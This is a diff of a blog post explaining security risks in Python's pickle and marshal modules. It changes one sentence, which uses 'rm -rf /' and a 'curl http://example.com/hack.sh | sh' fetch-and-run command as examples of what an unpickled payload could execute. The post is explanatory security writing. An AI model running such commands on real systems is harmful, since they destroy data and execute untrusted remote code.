arp242/arp242.net/_posts/2014-11-14-security-of-python's-pickle-and-marshal-modules.markdown

     boot  dev   etc       lib   lost+found  opt  root  sbin  sys  ubuntu  vagrant 0

-This was a harmless `ls /`, but could also be a less harmless `rm -rf /`, or a `curl http://example.com/hack.sh | sh`.
+This is a harmless `ls /`, but can also be a less harmless `rm -rf /`, or a `curl http://example.com/hack.sh | sh`.

 You can see how this works by using the `pickletools` module: